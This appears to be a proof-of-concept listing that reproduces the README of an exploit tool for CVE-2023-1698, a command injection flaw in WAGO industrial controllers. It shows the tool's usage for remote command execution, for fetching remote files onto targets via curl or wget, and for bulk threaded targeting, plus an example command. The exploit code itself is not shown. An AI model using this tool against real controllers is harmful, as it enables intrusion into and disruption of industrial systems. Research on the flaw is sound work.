POC details: 9ec75b81910528df791d10f50b39ade52ec5400f

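Source
Related vulnerability
Title: OS command injection vulnerability in multiple WAGO products (CVE-2023-1698)
Description: WAGO PFC100 and the other products listed here are made by the German company WAGO. WAGO PFC100 is a programmable logic controller (PLC). WAGO Compact Controller CC100 is a compact controller. WAGO Edge Controller is an edge controller. WAGO Compact Controller CC100, Edge Controller, PFC100, PFC200, Touch Panel 600 Advanced Line, Touch Panel 600 Marine Line, Touch Pane
Description
WAGO system remote code execution vulnerability (CVE-2023-1698)
Introduction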
# WAGO-CVE-2023-1698
WAGO system remote code execution vulnerability (CVE-2023-1698)
## Attention
I have developed a tool for local testing and POC development, which is for technical learning reference only. Please do not use it for illegal purposes. Any direct or indirect consequences and losses caused by individuals or organizations using the information provided in this article are the responsibility of the user themselves and have nothing to do with the author!!!

![image](https://github.com/thedarknessdied/WAGO-CVE-2023-1698/assets/56123966/309f6b3f-9b59-43dc-b2a4-c413a55bf275)


## Description
WAGO is a company specializing in electrical interconnection, automation, and interface electronics. In multiple WAGO products, a vulnerability allows an unauthenticated remote attacker to create new users and change device configurations, which may lead to remote code execution, denial of service, and damage to the entire system.

## Installation
> pip install -r requirements.txt

## Tools Usage
```text
python "WAGO-CVE-2023-1698 .py" -h
usage: WAGO-CVE-2023-1698 .py [-h] (-u URL | -f FILE)
                              [--remote-file-include REMOTE_FILE_INCLUDE | --local-file-include LOCAL_FILE_INCLUDE | --remote-command REMOTE_COMMAND]
                              [--random-agent RANDOM_AGENT] [-d DELAY] [-t THREAD] [--proxy PROXY] [--type TYPE] [-o OUTPUT]

WAGO System Remote Code Execution Vulnerability (CVE-2023-1698)

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Enter target object
  -f FILE, --file FILE  Input target object file
  --remote-file-include REMOTE_FILE_INCLUDE
                        Enter the filepath(it must be On the public network)
  --local-file-include LOCAL_FILE_INCLUDE
                        Enter the filepath(it must be On the local)
  --remote-command REMOTE_COMMAND
                        Enter the command you want to execute
  --random-agent RANDOM_AGENT
                        Using random user agents
  -d DELAY, --delay DELAY
                        Set multi threaded access latency (setting range from 0 to 5)
  -t THREAD, --thread THREAD
                        Set the number of program threads (setting range from 1 to 50)
  --proxy PROXY         Set up the proxy
  --type TYPE           Set up the remote upload file type
  -o OUTPUT, --output OUTPUT
                        output filename
```

## Params
> --remote-file-include: Specify a remote file URL; the file is uploaded to the tmp directory or the current directory through curl or wget
>
> --local-file-include: Parse a local shell script file and execute it remotely
>
> --remote-command REMOTE: Execute a system command

## Example
>python wago.py -u ** --proxy http://127.0.0.1:10809 --remote-command "cat /var/log/wago"
File snapshot

[4.0K] /data/pocs/9ec75b81910528df791d10f50b39ade52ec5400f
├── [1.0K] LICENSE
├── [2.9K] README.md
├── [ 18] requirements.txt
├── [3.2K] user_agent.py
└── [ 11K] WAGO-CVE-2023-1698 .py

0 directories, 5 files